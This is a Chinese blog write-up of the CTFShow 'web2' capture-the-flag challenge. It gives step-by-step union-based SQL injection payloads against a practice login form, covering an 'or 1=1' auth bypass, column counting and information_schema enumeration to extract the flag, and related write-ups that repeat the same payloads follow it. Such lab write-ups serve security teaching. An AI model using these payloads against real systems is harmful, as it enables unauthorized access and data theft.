CTFShow-WEB-web2解题过程

于 2024-11-26 15:15:49 发布
阅读量465 收藏 1
点赞数 4
CC 4.0 BY-SA版权
文章标签: 算法 sql web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/MoSiZh/article/details/144059157

本题的题目

看到本题的题目,尝试利用万能钥匙进行SQL注入,首先利用burp抓包(抓的数据包是你输入账号密码进行登录的这个包)

一、在username这里进行万能钥匙的注入

username=-admin'or 1=1 --+&password=admin

发现成功登陆,说明注入成功。

二、这时候利用order by 来判断列数,发现order by 3 是它的列数。

username=-admin'or 1=1 order by 3--+&password=admin

三、接下来利用让它报错显示回显点

-admin'or 1=1 union select 1,2,3 --+

 

在2处有回显点

四、接下来输入代码显示它的数据库

username=-admin'or 1=1 union select 1,database(),3 --+&password=admin

得知数据库名为web2后,查询数据库中的表名

username=-admin'or 1=1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='web2'--+&password=admin

很明显,web2中存在两个表,一个是flag,一个是user。既然我们要找flag,我们可以先查看flag这个表。

这时候我们就要输入

username=-admin'or 1=1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='web2'and table_name='flag'--+&password=admin

来查看flag表中存在的列名,发现列名只有一个是flag的

五、最后我们查看字段值就可以找到flag了。

username=-admin'or 1=1 union select 1,group_concat(flag),3 from flag--+&password=admin

本过程仅供参考,如有错误请指出

莫思竹
关注
CTFshow_web2
zoixsoadji的博客
02-28 2395
进入题目,发现题目很简单,首先试试万能密码登陆。 登陆成功,接下来使用bp抓包,并且寻找注入点。 找到注入点,接下来看看它的2下面有什么 查到表名为web2的数据库,接下来继续注入,查询字段。 查找到了flag和user两个数据表,接下来查询字段 最后查询字段内容,得到flag 本人萌新,大佬手下留情 >_< ...
ctfshow-WEB-web2_ctf
2401_84297618的博客
04-28 655
ctf.show WEB模块第2关是一个SQL注入漏洞,请求方式是POST请求,注入点是单引号字符型注入,flag就藏在当前的数据库的flag表中,使用联合注入获取数据即可在用户名的输入框中输入万能账号 a’ or true #,密码随便输登录成功,万能账号生效了,并且把查询到的用户名显示到了页面中,既然有显示位,那我们就用联合注入进行脱库首先,测试一下回显的位置,在用户名的输入框中输入一下payload,密码还是随便输。
ctfshow-WEB-web2
热门推荐
wangyuxiang946的博客
08-19 1万+
ctf.show WEB模块第2关是一个SQL注入漏洞,请求方式是POST请求,注入点是单引号字符型注入,flag就藏在当前的数据库的flag表中,使用联合注入获取数据即可 在用户名的输入框中输入万能账号a' or true #,密码随便输 登录成功,万能账号生效了,并且把查询到的用户名显示到了页面中,既然有显示位,那我们就用联合注入进行脱库 首先,测试一下回显的位置,在用户名的输入框中输入一下payload,密码还是随便输 a' union select 1,2...
CTFshow-web-web2
qq_68581192的博客
10-07 226
获取flag表的字段,输入1’ union select 1, (select group_concat(column_name) from information_schema.columns where table_schema=‘web2’ and table_name=‘flag’) ,3 # 显示如下 发现只有一个字段。获取flag表的数据,1’ union select 1,(select flag from flag),3 # 显示如下。
ctfshow-web2
HAI_WD的博客
07-24 406
知道这里是sql注入,确认一下是什么类型的闭合。可以知道闭合是单引号闭合,然后查一下显示的位数。这道题很多wp,但是为了完整性还是写一下。然后知道库了之后,锁定一下数据表。
ctfshow-VIP题目-Web-详细解题思路
01-27
vim临时文件泄露:vim在编辑时会生成一个隐藏的临时文件,当vim非正常关闭时这个文件就会被保留下来,根据题目提示,访问index.php.swp,打开文件看到flag,flag:ctfshow{66a38e7e-2ef8-4114-91cd-b750b64dc7dd}。...
ctfshow-web41~60-WP
02-21
本篇文章主要关注的是CTFShow中的Web挑战第41至60题的解题思路与技术细节,尤其是题目41中的命令注入攻击。 #### 题目背景与目标 在题目41中,参与者需要分析给定的PHP代码片段,理解其逻辑并找到漏洞所在。目标是...
2024年网安最全ctfshow-WEB-web3_ctfshow web3(1)
2401_84264583的博客
05-01 669
php://input 可以访问请求的原始数据,配合文件包含漏洞可以将post请求体中的内容当做文件内容执行,enctype=multipart/form-data"时,php:/input将会无效。ctf.show WEB模块的第3关是一个文件包含漏洞,include()函数包含的文件会被执行,我们使用PHP伪协议配合抓包工具进行命令执行,从而获取flag。很明显这个crf_go_go_go文件就是存放flag的文件。这一关的flag就存放在网站跟路径下的文件中。
2024年网安最新ctfshow-WEB-web11( 利用session绕过登录验证)_ctfshow web11
最新发布
2401_84297796的博客
05-03 639
ctf.show WEB模块第11关用session中保存的密码进行登录验证, 将 session中保存的密码清空即可绕过页面中直接给了源码, 很明显是让我们进行代码审计, 源码中将我们输入的密码与 session中保存的密码进行匹配, 两个password相同即可登录成功。
CTF秀web2
天天学安全专属博客
11-20 1150
CTF秀web2,union注入详解
ctfshow web2
m0_63253040的博客
03-12 1818
打开环境是一个登入页面, 题目提示:最简单的SQL注入,那么先试一试万能密码登入 ' or 1=1# 密码随便输 存在回显,直接sql注入 ' or 1=1 order by 3# 正常回显,爆到4时不回显 ' or 1=1 order by 4# 开始爆库名 ,先看看是哪个位置会回显 ' or 1=1 union select 1,2,3# 发现是可以不用输密码的 ' or 1=1 union select 1,database(),3# 得到库...
CTFshow WEB web2
Y1da的博客
04-19 860
CTFshow WEB web2 直接登录发现URL无变化,网页使用POST传递参数,使用Burp抓包 POST / HTTP/1.1 Host: d19be25d-ff35-4fa2-b9c2-957c36215fe4.challenge.ctf.show Content-Length: 21 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://d19be25d-ff35-4fa2-b9c2-957c36215fe
ctf.show_web2
Huamang的博客
02-02 848
万能密码回显成功 查询字段数没有回显 那就联合查询union select,从1试到1,2,3发现三个字段,而且回显位置是第二个 所以开始查询表名 1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()# 出现了flag字段,开始查询flag表的字段名 1' union select 1,group_concat(column_name),3 f
ctfshowweb2
夜未至
03-21 366
本人开了一个知识星球,在星球里每天更新网络安全的文章,其中包含在安全中用到的工具和脚本,分享全国职业技能大赛的相关具体细节及解题思路,在星球中有问必答。然后在地址栏回车,就可以查看网页源代码了,获取到flag:ctfshow{42393163-8074-436c-8383-425d3bd989b6}同样也是开发人员忘记了在发布版本去掉那些注释,只不过web2里禁用了右键检查而已,查看源代码的方式还是有很多,总结:前端验证都是不安全的验证。
ctfshow web-2(sql注入)
m0_73303597的博客
11-21 2133
自用
CTFshowWEB2
精神大火的博客
03-21 1660
该题考察SQL注入漏洞,之前对SQL注入仅有部分了解,通过该题进行复习深入。
CTFshow Web2
Lig_HossssT的博客
10-09 515
’ or 1=1 union select 1,database(),3# 查阅数据库得到数据库’web2’ ’ or 1=1 union select 1,table_name,3 from information_schema.tables where table_schema=‘web2’#查数据表 ’ or 1=1 union select 1,column_name,3 from information_schema.columns where table_name=‘flag’#查字...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值